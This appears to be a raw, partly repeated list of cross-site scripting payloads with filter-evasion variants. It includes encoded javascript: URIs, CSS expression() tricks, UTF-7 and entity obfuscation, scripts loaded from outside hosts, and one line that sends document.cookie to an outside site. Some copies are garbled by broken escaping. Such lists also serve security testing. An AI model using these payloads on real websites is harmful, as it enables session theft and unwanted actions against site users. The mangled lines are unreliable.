&lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt;
&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;
&lt;HTML xmlns:xss&gt;
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;
&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;
&lt;HTML&gt;&lt;BODY&gt;
&lt;!--[if gte IE 4]&gt;               
&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt;
&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;
&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;
&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;
&lt;? echo(&apos;&lt;SCR)&apos;;
&lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt;
&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;
&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;
&lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt;
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
&lt;DIV STYLE=&quot;background-image:\\0075\\0072\\006C\\0028&apos;\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029&apos;\\0029&quot;&gt;
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-
\\&quot;;alert(&apos;XSS&apos;);//
&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt;
&lt;STYLE&gt;@im\\port&apos;\\ja\\vasc\\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt;
&lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D;
perl -e &apos;print &quot;&lt;IMG SRC=java\\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out
perl -e &apos;print &quot;&amp;&lt;SCR\\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\\0IPT&gt;&quot;;&apos; &gt; out
&lt;IMG SRC=&quot; &amp;#14;  javascript:alert(&apos;XSS&apos;);&quot;&gt;
&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\\]^`=alert(&quot;XSS&quot;)&gt;
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;
&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;
&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;
&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;
&lt;SCRIPT&gt;a=/XSS/
&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;
&lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;
<script>document.vulnerable=true;</script>
<img SRC=\"jav ascript:document.vulnerable=true;\">
<img SRC=\"javascript:document.vulnerable=true;\">
<img SRC=\" &#14; javascript:document.vulnerable=true;\">
<body onload!#$%&()*~+-_.,:;?@[/|\\]^`=document.vulnerable=true;>
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
<script <B>document.vulnerable=true;</script>
<img SRC=\"javascript:document.vulnerable=true;\"
<iframe src=\"javascript:document.vulnerable=true; <
<script>a=/XSS/\\ndocument.vulnerable=true;</script>
\\\";document.vulnerable=true;;//
</title><SCRIPT>document.vulnerable=true;</script>
<input TYPE=\"IMAGE\" SRC=\"javascript:document.vulnerable=true;\">
<body BACKGROUND=\"javascript:document.vulnerable=true;\">
<body ONLOAD=document.vulnerable=true;>
<img DYNSRC=\"javascript:document.vulnerable=true;\">
<img LOWSRC=\"javascript:document.vulnerable=true;\">
<bgsound SRC=\"javascript:document.vulnerable=true;\">
<br SIZE=\"&{document.vulnerable=true}\">
<LAYER SRC=\"javascript:document.vulnerable=true;\"></LAYER>
<link REL=\"stylesheet\" HREF=\"javascript:document.vulnerable=true;\">
<style>li {list-style-image: url(\"javascript:document.vulnerable=true;\");</STYLE><UL><LI>XSS
<img SRC='vbscript:document.vulnerable=true;'>
1script3document.vulnerable=true;1/script3
<meta HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:document.vulnerable=true;\">
<meta HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:document.vulnerable=true;\">
<IFRAME SRC=\"javascript:document.vulnerable=true;\"></iframe>
<FRAMESET><FRAME SRC=\"javascript:document.vulnerable=true;\"></frameset>
<table BACKGROUND=\"javascript:document.vulnerable=true;\">
<table><TD BACKGROUND=\"javascript:document.vulnerable=true;\">
<div STYLE=\"background-image: url(javascript:document.vulnerable=true;)\">
<div STYLE=\"background-image: url(&#1;javascript:document.vulnerable=true;)\">
<div STYLE=\"width: expression(document.vulnerable=true);\">
<style>@im\\port'\\ja\\vasc\\ript:document.vulnerable=true';</style>
<img STYLE=\"xss:expr/*XSS*/ession(document.vulnerable=true)\">
<XSS STYLE=\"xss:expression(document.vulnerable=true)\">
exp/*<A STYLE='no\\xss:noxss(\"*//*\");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
<style TYPE=\"text/javascript\">document.vulnerable=true;</style>
<style>.XSS{background-image:url(\"javascript:document.vulnerable=true\");}</STYLE><A CLASS=XSS></a>
<style type=\"text/css\">BODY{background:url(\"javascript:document.vulnerable=true\")}</style>
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
<base HREF=\"javascript:document.vulnerable=true;//\">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
<XML ID=I><X><C><![<IMG SRC=\"javas]]<![cript:document.vulnerable=true;\">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:document.vulnerable=true\"></B></I></XML><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></span>
<html><BODY><?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"><?import namespace=\"t\" implementation=\"#default#time2\"><t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>\"></BODY></html>
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
<meta HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>document.vulnerable=true</SCRIPT>\">
<head><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
<a href=\"javascript#document.vulnerable=true;\">
<div onmouseover=\"document.vulnerable=true;\">
<img src=\"javascript:document.vulnerable=true;\">
<img dynsrc=\"javascript:document.vulnerable=true;\">
<input type=\"image\" dynsrc=\"javascript:document.vulnerable=true;\">
<bgsound src=\"javascript:document.vulnerable=true;\">
&<script>document.vulnerable=true;</script>
&{document.vulnerable=true;};
<img src=&{document.vulnerable=true;};>
<link rel=\"stylesheet\" href=\"javascript:document.vulnerable=true;\">
<iframe src=\"vbscript:document.vulnerable=true;\">
<img src=\"mocha:document.vulnerable=true;\">
<img src=\"livescript:document.vulnerable=true;\">
<a href=\"about:<script>document.vulnerable=true;</script>\">
<meta http-equiv=\"refresh\" content=\"0;url=javascript:document.vulnerable=true;\">
<body onload=\"document.vulnerable=true;\">
<div style=\"background-image: url(javascript:document.vulnerable=true;);\">
<div style=\"behaviour: url([link to code]);\">
<div style=\"binding: url([link to code]);\">
<div style=\"width: expression(document.vulnerable=true;);\">
<style type=\"text/javascript\">document.vulnerable=true;</style>
<object classid=\"clsid:...\" codebase=\"javascript:document.vulnerable=true;\">
<style><!--</style><script>document.vulnerable=true;//--></script>
<<script>document.vulnerable=true;</script>
<![<!--]]<script>document.vulnerable=true;//--></script>
<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
<img src=\"blah\"onmouseover=\"document.vulnerable=true;\">
<img src=\"blah>\" onmouseover=\"document.vulnerable=true;\">
<xml src=\"javascript:document.vulnerable=true;\">
<xml id=\"X\"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
<div datafld=\"b\" dataformatas=\"html\" datasrc=\"#X\"></div>
[\\xC0][\\xBC]script>document.vulnerable=true;[\\xC0][\\xBC]/script>
<style>@import'http://www.securitycompass.com/xss.css';</style>
<meta HTTP-EQUIV=\"Link\" Content=\"<http://www.securitycompass.com/xss.css>; REL=stylesheet\">
<style>BODY{-moz-binding:url(\"http://www.securitycompass.com/xssmoz.xml#xss\")}</style>
<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://www.securitycompass.com/scriptlet.html\"></object>
<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://www.securitycompass.com/xss.htc\"><xss:xss>XSS</xss:xss></html>
<script SRC=\"http://www.securitycompass.com/xss.jpg\"></script>
<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'\"-->
<script a=\">\" SRC=\"http://www.securitycompass.com/xss.js\"></script>
<script =\">\" SRC=\"http://www.securitycompass.com/xss.js\"></script>
<script a=\">\" '' SRC=\"http://www.securitycompass.com/xss.js\"></script>
<script \"a='>'\" SRC=\"http://www.securitycompass.com/xss.js\"></script>
<script a=`>` SRC=\"http://www.securitycompass.com/xss.js\"></script>
<script a=\">'>\" SRC=\"http://www.securitycompass.com/xss.js\"></script>
<script>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://www.securitycompass.com/xss.js\"></script>
<div style=\"binding: url(http://www.securitycompass.com/xss.js);\"> [Mozilla]
&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\\]^`=alert(&quot;XSS&quot;)&gt;
&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
&lt;/br style=a:expression(alert())&gt;
&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;
&lt;br size=\\&quot;&amp;{alert(&#039;XSS&#039;)}\\&quot;&gt;
perl -e &#039;print \\&quot;&lt;IMG SRC=java\\0script:alert(\\&quot;XSS\\&quot;)&gt;\\&quot;;&#039; &gt; out
perl -e &#039;print \\&quot;&lt;SCR\\0IPT&gt;alert(\\&quot;XSS\\&quot;)&lt;/SCR\\0IPT&gt;\\&quot;;&#039; &gt; out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location=\"http://www.procheckup.com/?sid=\"%2bdocument.cookie)>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<~/XSS STYLE=xss:expression(alert('XSS'))>
\"><script>alert('XSS')</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
</XSS STYLE=xss:expression(alert('XSS'))>
';;alert(String.fromCharCode(88,83,83))//\\';;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//\\\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;\";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
';';;!--\";<;XSS>;=&;{()}
<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;
<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;
<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
<;BASE HREF=\";javascript:alert(';XSS';);//\";>;
<;BGSOUND SRC=\";javascript:alert(';XSS';);\";>;
<;BODY BACKGROUND=\";javascript:alert(';XSS';);\";>;
<;BODY ONLOAD=alert(';XSS';)>;
<;DIV STYLE=\";background-image: url(javascript:alert(';XSS';))\";>;
<;DIV STYLE=\";background-image: url(&;#1;javascript:alert(';XSS';))\";>;
<;DIV STYLE=\";width: expression(alert(';XSS';));\";>;
<;FRAMESET>;<;FRAME SRC=\";javascript:alert(';XSS';);\";>;<;/FRAMESET>;
<;IFRAME SRC=\";javascript:alert(';XSS';);\";>;<;/IFRAME>;
<;INPUT TYPE=\";IMAGE\"; SRC=\";javascript:alert(';XSS';);\";>;
<;IMG SRC=\";javascript:alert(';XSS';);\";>;
<;IMG SRC=javascript:alert(';XSS';)>;
<;IMG DYNSRC=\";javascript:alert(';XSS';);\";>;
<;IMG LOWSRC=\";javascript:alert(';XSS';);\";>;
<;IMG SRC=\";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\";>;
Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser
exp/*<;XSS STYLE=';no\\xss:noxss(\";*//*\";);
<;STYLE>;li {list-style-image: url(\";javascript:alert(&#39;XSS&#39;)\";);}<;/STYLE>;<;UL>;<;LI>;XSS
<;IMG SRC=';vbscript:msgbox(\";XSS\";)';>;
<;LAYER SRC=\";http://ha.ckers.org/scriptlet.html\";>;<;/LAYER>;
<;IMG SRC=\";livescript:[code]\";>;
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
<;META HTTP-EQUIV=\";refresh\"; CONTENT=\";0;url=javascript:alert(';XSS';);\";>;
<;META HTTP-EQUIV=\";refresh\"; CONTENT=\";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\";>;
<;META HTTP-EQUIV=\";refresh\"; CONTENT=\";0; URL=http://;URL=javascript:alert(';XSS';);\";>;
<;IMG SRC=\";mocha:[code]\";>;
<;OBJECT TYPE=\";text/x-scriptlet\"; DATA=\";http://ha.ckers.org/scriptlet.html\";>;<;/OBJECT>;
<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>;
<;EMBED SRC=\";http://ha.ckers.org/xss.swf\"; AllowScriptAccess=\";always\";>;<;/EMBED>;
a=\";get\";;&;#10;b=\";URL(\";\";;&;#10;c=\";javascript:\";;&;#10;d=\";alert(';XSS';);\";)\";;&#10;eval(a+b+c+d);
<;STYLE TYPE=\";text/javascript\";>;alert(';XSS';);<;/STYLE>;
<;IMG STYLE=\";xss:expr/*XSS*/ession(alert(';XSS';))\";>;
<;XSS STYLE=\";xss:expression(alert(';XSS';))\";>;
<;STYLE>;.XSS{background-image:url(\";javascript:alert(';XSS';)\";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
<;STYLE type=\";text/css\";>;BODY{background:url(\";javascript:alert(';XSS';)\";)}<;/STYLE>;
<;LINK REL=\";stylesheet\"; HREF=\";javascript:alert(';XSS';);\";>;
<;LINK REL=\";stylesheet\"; HREF=\";http://ha.ckers.org/xss.css\";>;
<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;
<;META HTTP-EQUIV=\";Link\"; Content=\";<;http://ha.ckers.org/xss.css>;; REL=stylesheet\";>;
<;STYLE>;BODY{-moz-binding:url(\";http://ha.ckers.org/xssmoz.xml#xss\";)}<;/STYLE>;
<;TABLE BACKGROUND=\";javascript:alert(';XSS';)\";>;<;/TABLE>;
<;TABLE>;<;TD BACKGROUND=\";javascript:alert(';XSS';)\";>;<;/TD>;<;/TABLE>;
<;HTML xmlns:xss>;
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=\";javas]]>;<;![CDATA[cript:alert(';XSS';);\";>;]]>;
<;XML ID=\";xss\";>;<;I>;<;B>;<;IMG SRC=\";javas<;!-- -->;cript:alert(';XSS';)\";>;<;/B>;<;/I>;<;/XML>;
<;XML SRC=\";http://ha.ckers.org/xsstest.xml\"; ID=I>;<;/XML>;
<;HTML>;<;BODY>;
<;!--[if gte IE 4]>;           
<;META HTTP-EQUIV=\";Set-Cookie\"; Content=\";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;\";>;
<;XSS STYLE=\";behavior: url(http://ha.ckers.org/xss.htc);\";>;
<;SCRIPT SRC=\";http://ha.ckers.org/xss.jpg\";>;<;/SCRIPT>;
<;!--#exec cmd=\";/bin/echo ';<;SCRIPT SRC';\";-->;<;!--#exec cmd=\";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';\";-->;
<;? echo(';<;SCR)';;
<;BR SIZE=\";&;{alert(';XSS';)}\";>;
<;IMG SRC=JaVaScRiPt:alert(';XSS';)>;
<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;
<;IMG SRC=`javascript:alert(\";RSnake says, ';XSS';\";)`>;
<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;
<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;
<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;
<;DIV STYLE=\";background-image:\\0075\\0072\\006C\\0028';\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.10530053\\0027\\0029';\\0029\";>;
<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;
<;HEAD>;<;META HTTP-EQUIV=\";CONTENT-TYPE\"; CONTENT=\";text/html; charset=UTF-7\";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-
\\\";;alert(';XSS';);//
<;/TITLE>;<;SCRIPT>;alert(\"XSS\");<;/SCRIPT>;
<;STYLE>;@im\\port';\\ja\\vasc\\ript:alert(\";XSS\";)';;<;/STYLE>;
<;IMG SRC=\";jav&#x09;ascript:alert(';XSS';);\";>;
<;IMG SRC=\";jav&;#x09;ascript:alert(';XSS';);\";>;
<;IMG SRC=\";jav&;#x0A;ascript:alert(';XSS';);\";>;
<;IMG SRC=\";jav&;#x0D;ascript:alert(';XSS';);\";>;
<;IMG&#x0D;SRC&#x0D;=&#x0D;\";&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;&#x0D;';&#x0D;X&#x0D;S&#x0D;S&#x0D;';&#x0D;)&#x0D;\";&#x0D;>;&#x0D;
perl -e ';print \";<;IM SRC=java\\0script:alert(\";XSS\";)>\";;';>; out
perl -e ';print \";&;<;SCR\\0IPT>;alert(\";XSS\";)<;/SCR\\0IPT>;\";;'; >; out
<;IMG SRC=\"; &;#14;  javascript:alert(';XSS';);\";>;
<;SCRIPT/XSS SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;
<;BODY onload!#$%&;()*~+-_.,:;?@[/|\\]^`=alert(\";XSS\";)>;
<;SCRIPT SRC=http://ha.ckers.org/xss.js
<;SCRIPT SRC=//ha.ckers.org/.j>;
<;IMG SRC=\";javascript:alert(';XSS';)\";
<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
<;<;SCRIPT>;alert(\";XSS\";);//<;<;/SCRIPT>;
<;IMG \";\";\";>;<;SCRIPT>;alert(\";XSS\";)<;/SCRIPT>;\";>;
<;SCRIPT>;a=/XSS/
<;SCRIPT a=\";>;\"; SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;
<;SCRIPT =\";blah\"; SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;
<;SCRIPT a=\";blah\"; ';'; SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;
<;SCRIPT \";a=';>;';\"; SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;
<;SCRIPT a=`>;` SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;
<;SCRIPT>;document.write(\";<;SCRI\";);<;/SCRIPT>;PT SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;
<;SCRIPT a=\";>';>\"; SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;
<;A HREF=\";http://66.102.7.147/\";>;XSS<;/A>;
<;A HREF=\";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\";>;XSS<;/A>;
<;A HREF=\";http://1113982867/\";>;XSS<;/A>;
<;A HREF=\";http://0x42.0x0000066.0x7.0x93/\";>;XSS<;/A>;
<;A HREF=\";http://0102.0146.0007.00000223/\";>;XSS<;/A>;
<;A HREF=\";h&#x0A;tt&#09;p://6&;#09;6.000146.0x7.147/\";>;XSS<;/A>;
<;A HREF=\";//www.google.com/\";>;XSS<;/A>;
<;A HREF=\";//google\";>;XSS<;/A>;
<;A HREF=\";http://ha.ckers.org@google\";>;XSS<;/A>;
<;A HREF=\";http://google:ha.ckers.org\";>;XSS<;/A>;
<;A HREF=\";http://google.com/\";>;XSS<;/A>;
<;A HREF=\";http://www.google.com./\";>;XSS<;/A>;
<;A HREF=\";javascript:document.location=';http://www.google.com/';\";>;XSS<;/A>;
<;A HREF=\";http://www.gohttp://www.google.com/ogle.com/\";>;XSS<;/A>;
<script>document.vulnerable=true;</script>
<img SRC=\"jav ascript:document.vulnerable=true;\">
<img SRC=\"javascript:document.vulnerable=true;\">
<img SRC=\" &#14; javascript:document.vulnerable=true;\">
<body onload!#$%&()*~+-_.,:;?@[/|\\]^`=document.vulnerable=true;>
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
<script <B>document.vulnerable=true;</script>
<img SRC=\"javascript:document.vulnerable=true;\"
<iframe src=\"javascript:document.vulnerable=true; <
<script>a=/XSS/\\ndocument.vulnerable=true;</script>
\\\";document.vulnerable=true;;//
</title><SCRIPT>document.vulnerable=true;</script>
<input TYPE=\"IMAGE\" SRC=\"javascript:document.vulnerable=true;\">
<body BACKGROUND=\"javascript:document.vulnerable=true;\">
<body ONLOAD=document.vulnerable=true;>
<img DYNSRC=\"javascript:document.vulnerable=true;\">
<img LOWSRC=\"javascript:document.vulnerable=true;\">
<bgsound SRC=\"javascript:document.vulnerable=true;\">
<br SIZE=\"&{document.vulnerable=true}\">
<LAYER SRC=\"javascript:document.vulnerable=true;\"></LAYER>
<link REL=\"stylesheet\" HREF=\"javascript:document.vulnerable=true;\">
<style>li {list-style-image: url(\"javascript:document.vulnerable=true;\");</STYLE><UL><LI>XSS
<img SRC='vbscript:document.vulnerable=true;'>
1script3document.vulnerable=true;1/script3
<meta HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:document.vulnerable=true;\">
<meta HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:document.vulnerable=true;\">
<IFRAME SRC=\"javascript:document.vulnerable=true;\"></iframe>
<FRAMESET><FRAME SRC=\"javascript:document.vulnerable=true;\"></frameset>
<table BACKGROUND=\"javascript:document.vulnerable=true;\">
<table><TD BACKGROUND=\"javascript:document.vulnerable=true;\">
<div STYLE=\"background-image: url(javascript:document.vulnerable=true;)\">
<div STYLE=\"background-image: url(&#1;javascript:document.vulnerable=true;)\">
<div STYLE=\"width: expression(document.vulnerable=true);\">
<style>@im\\port'\\ja\\vasc\\ript:document.vulnerable=true';</style>
<img STYLE=\"xss:expr/*XSS*/ession(document.vulnerable=true)\">
<XSS STYLE=\"xss:expression(document.vulnerable=true)\">
